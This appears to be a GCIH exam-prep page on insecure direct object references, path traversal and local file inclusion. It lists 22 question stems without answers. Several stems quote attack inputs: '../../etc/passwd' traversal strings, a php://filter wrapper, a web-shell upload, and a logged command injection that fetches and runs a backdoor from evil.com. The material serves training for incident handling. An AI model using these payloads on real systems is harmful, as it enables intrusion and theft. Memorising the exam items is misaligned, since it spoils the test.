GCIH · domain
Exploiting Insecure Web App References
This domain covers insecure direct object references (IDOR), path traversal, and local file inclusion in web applications. For GCIH, questions present scenarios like Base64-encoded object IDs, predictable numeric parameters, or PHP filter wrappers, requiring you to identify the missing authorization check and explain why encoding or obscurity fails as a security control.
Focused practice
Practice Exploiting Insecure Web App References questions
Scored sessions drawing only from this domain — pick a length below.
What this domain covers
What to know about Exploiting Insecure Web App References
A candidate must be able to identify missing server-side authorization checks in object references and file inclusion parameters. The single most important thing is to verify access control using two distinct user accounts, because encoding, predictable IDs, or client-side controls do not prevent unauthorized access.
Identifying IDOR when changing a numeric user_id parameter returns another user's profile
Recognizing Base64-encoded object references as reversible and not an authorization control
Testing with two distinct user accounts to confirm horizontal privilege escalation
Analyzing LFI via php://filter/convert.base64-encode/resource= in web server logs
Watch out for
Common Exploiting Insecure Web App References exam traps
- ▸Assuming Base64 encoding provides security; it is reversible and does not enforce authorization.
- ▸Testing IDOR with only one account, missing unauthorized access that a second account would reveal.
- ▸Confusing path traversal with LFI; LFI includes local files via wrappers, while traversal moves directories.
Question index
All Exploiting Insecure Web App References questions (22)
Click any question to see the full explanation, or start a practice session above.
An incident handler investigates a web application breach where an authenticated user modified a hidden form parameter containing an integer account ID, successfully viewing financial records belonging to other customers. Which underlying vulnerability class allowed this unauthorized data access?
Medium2A penetration tester is reviewing a Java-based e-commerce application. The product page URL is `https://shop.example.com/product?pid=1042`. When the tester changes `pid` to `1043`, the application returns the details of a different product. The tester then changes `pid` to `1043'` and receives a detailed Java stack trace in the HTTP response. Which type of vulnerability is most directly indicated by the stack trace, and what should the tester do next to confirm the impact?
Medium3Which of the following is the most secure method for handling file references in a web application to prevent path traversal?
Easy4During a web application penetration test, you notice that a request to `/download?doc=8841` returns a PDF belonging to a different department. You change the value to `8842` and receive another department's document. The session cookie remains unchanged for both requests. Which conclusion best fits these observations?
Easy5A web application allows users to upload profile pictures. The upload functionality is handled by `upload.php`, which saves files to `/var/www/uploads/` and returns a URL like `https://example.com/uploads/username.jpg`. A security tester notices that the application does not validate the file type and that the upload directory is web-accessible. The tester uploads a file named `shell.php` containing PHP code and then navigates to `https://example.com/uploads/shell.php`. The server executes the PHP code. Which vulnerability has the tester exploited?
Easy6A penetration tester is assessing a RESTful API that manages user orders. The endpoint to retrieve an order is `GET /api/orders/{orderId}`. The tester, authenticated as user Alice, captures a request for her own order with `orderId=1001`. She then modifies the request to `orderId=1002` and receives the order details belonging to user Bob, including Bob's shipping address and items. The application did not check if the order belonged to Alice. Which type of vulnerability is this?
Medium7An application generates invoice PDFs on demand and caches them under `/var/app/cache/<userId>/<invoiceId>.pdf`. The download handler builds the path with `Paths.get(cacheRoot, userId, invoiceId + ".pdf")` and calls `Files.exists` before streaming. During an incident review, a crafted `invoiceId` value of `../../../../etc/hosts%00` produced a successful read. Which factor best explains why the containment check failed?
Hard8An attacker manipulates a URL parameter `?file=invoice_123.pdf` to `?file=../../etc/passwd` on a web server. The application successfully returns the sensitive system file content. Which vulnerability is being exploited?
Medium9Which of the following is the most critical step to perform after detecting a successful IDOR exploit?
Hard10A financial services company is hardening a REST API that returns account statements. Each request includes a numeric `accountId`, and the API currently returns the statement whenever the `accountId` exists. The security team wants to close the insecure direct object reference exposure without redesigning the data model. Which two controls, applied together, most directly address the flaw? (Choose two.)
Medium11A web application serves user-uploaded documents through a request to `/api/v1/documents/{docGuid}`. The `docGuid` is a version 4 UUID that appears unguessable, and the API returns the document for any authenticated user who supplies a valid GUID. During an incident-handling review, you note that the GUID is also exposed in a public activity feed that lists recent uploads. What is the most significant reference-handling weakness in this design?
Medium12A security incident responder is analyzing a web server compromise. The attacker gained initial access through a vulnerable web application and then executed a command to download a tool from a remote server. The responder finds the following in the web server logs: `GET /cgi-bin/printenv?QUERY_STRING=%3Bwget%20http%3A%2F%2Fevil.com%2Fbackdoor%20-O%20%2Ftmp%2Fbd%3Bchmod%20%2Bx%20%2Ftmp%2Fbd%3B%2Ftmp%2Fbd`. The responder needs to identify the specific technique used and the appropriate containment step. Which of the following best describes the technique and the immediate containment action?
Hard13A security engineer is reviewing a web application that uses a parameter `account` to retrieve account details. The parameter value is a base64-encoded string of the account number, such as `YWNjb3VudD0xMjM0`. An attacker decodes the string, changes the account number, re-encodes it, and successfully accesses another user's account. Which of the following is the most likely reason this attack succeeded?
Medium14A security analyst is reviewing a web application that uses a parameter `doc_id` to retrieve documents from a database. The application does not validate that the requested document belongs to the authenticated user. During an incident response, the analyst observes multiple requests with sequential `doc_id` values from a single IP address. Which TWO of the following actions should the analyst take to confirm and mitigate the IDOR vulnerability? (Choose two.)
Hard15Which TWO of the following practices are the most effective at mitigating Insecure Direct Object Reference (IDOR) vulnerabilities?
Medium16An application uses a Base64 encoded string as a parameter for object references. An attacker decodes the string, modifies the ID, re-encodes it, and successfully accesses unauthorized data. Why did the security control fail?
Hard17A web application allows users to download files by specifying a filename in the URL, such as `download?file=report.pdf`. An attacker changes the parameter to `download?file=../../../../etc/passwd` and successfully retrieves the system's password file. Which of the following best describes this attack?
Easy18Which of the following describes the core difference between Path Traversal and IDOR?
Easy19When auditing an application for Insecure Direct Object References, why is it recommended to perform tests using two distinct user accounts?
Medium20A penetration tester discovers that a web application uses a predictable numeric parameter `user_id` in the URL to retrieve user profiles. While authenticated as user 1001, the tester changes the parameter to 1002 and successfully views another user's profile. The application does not perform any additional authorization checks beyond verifying the session. Which of the following best describes the vulnerability and its immediate impact?
Medium21A security analyst is investigating a suspected local file inclusion (LFI) attack against a PHP web application. The web server logs show the following request: `GET /download.php?file=php://filter/convert.base64-encode/resource=index.php`. The analyst needs to determine the attacker's objective and the potential impact. (Choose two.)
Hard22How can an application distinguish between an authorized user requesting their own profile and an unauthorized user attempting to access a different profile via IDOR?
MediumOther domains
All GCIH exam domains
Frequently asked questions
- What does the Exploiting Insecure Web App References domain cover on the GCIH exam?
- A candidate must be able to identify missing server-side authorization checks in object references and file inclusion parameters. The single most important thing is to verify access control using two distinct user accounts, because encoding, predictable IDs, or client-side controls do not prevent unauthorized access.
- How many questions are in this domain?
- This page lists all 22 Exploiting Insecure Web App References questions in the GCIH question bank. The actual exam draws from this domain proportionally to its weighting in the official exam blueprint.
- What is the best way to practise this domain?
- Start with a short focused session (10 questions) to identify gaps, then work through explanations. Repeat with a longer session once the weak areas feel solid.
- Can I practise only Exploiting Insecure Web App References questions?
- Yes — the session launcher on this page filters questions to this domain only. Choose any session length for inline explanations and scoring.